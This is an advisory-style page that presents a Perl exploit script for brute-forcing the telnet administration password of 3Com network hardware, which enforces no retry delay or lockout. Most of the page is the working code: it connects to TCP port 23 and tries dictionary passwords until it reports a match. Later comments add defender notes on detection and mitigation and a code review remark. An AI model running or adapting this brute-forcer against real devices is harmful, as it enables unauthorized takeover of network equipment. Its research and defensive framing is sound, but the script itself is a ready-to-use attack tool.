Some of 3Com's network hardware employs a built-in telnet daemon that allows administration of the remote hardware through a command-line-like interface. This interface is password protected, but since the product does not enforce a timeout or a delay between retries, it can easily be brute-forced. The following exploit code does just that: it brute-forces the telnet daemon's password.
Credit:
The information has been provided by Siberian.
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
while(defined($passwd = <FILE1>)) {
chop($passwd);
print ".";
while($i != 3) {
if($ol eq "L"){
send(SOCK,$userf,0);
}
if($ol eq "P") {
$passwd = join '', $passwd, chr(13), chr(10);
send(SOCK,$passwd,0);
}
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
recv(SOCK,$ol,1,0);
}
if($ol eq "M") {
print "\n\nPassword for $userh is $passwd\n";
exit 0;
}
$i++
}
$i=1;
}
print "\n\nIt's sad but true, you failed.\n";
}
# ---------------------------------------------------------------------------
# Script entry point for the 3Com telnet login brute-forcer described above.
# Flow: parse argv, resolve the target, open one TCP connection to port 23,
# open the dictionary, nudge the login prompt, then hand over to guesspass().
#
# Defender's notes, limited to what this script does:
#  - Every guess travels over a single cleartext telnet session to TCP/23,
#    so a run looks like one long-lived connection carrying many consecutive
#    login prompts; device login logs and connection duration are the
#    observable signals.
#  - The premise stated above is that the daemon has no retry delay or
#    lockout; a per-attempt delay, an attempt cap, or restricting management
#    access to trusted hosts removes the condition this script relies on.
# No "use strict"/"use warnings" and no "use Socket" are visible in this
# excerpt; inet_aton/sockaddr_in/AF_INET presumably come from Socket.
# ---------------------------------------------------------------------------
print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";
# argv: [1] target host, [2] dictionary file; both required (die with usage).
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
# Optional third argument: login name, defaults to "admin". The inner
# assignment is redundant; the outer one stores the same value.
$userf = shift || ($userf = "admin");
# Resolve the host and build a sockaddr for port 23 (telnet).
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
# SOCK is a bareword (global) filehandle; the guessing loop shown earlier in
# the file reads and writes it directly.
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";
# NOTE(review): two-argument open with the path interpolated means a
# dictionary argument beginning with '>' or ending in '|' is parsed as a
# mode or a pipe rather than a plain filename; three-argument
# open(FILE1, '<', $passf) would read it literally. FILE1 is also a bareword
# handle, consumed line by line by the guessing loop.
open(FILE1, "$passf") || die "Can't open Password list!";
# Read and discard one byte, then send LF CR LF -- presumably to provoke a
# fresh login prompt that the guessing loop can synchronise on.
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);
# guesspass() is defined elsewhere in the file (its header is not in this
# excerpt); the loop shown above appears to be its body and exits the
# process itself on success.
guesspass();